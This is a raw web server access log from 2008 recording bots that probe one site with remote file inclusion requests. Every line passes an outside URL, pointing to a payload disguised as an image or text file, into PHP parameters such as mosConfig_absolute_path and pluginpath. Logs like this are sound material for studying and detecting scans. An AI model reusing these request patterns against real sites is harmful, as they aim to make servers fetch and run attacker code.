69.89.22.139 - - [08/Jun/2008:09:39:15 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:15 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:39:16 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:39:23 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:39:28 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:39:29 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:39:29 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
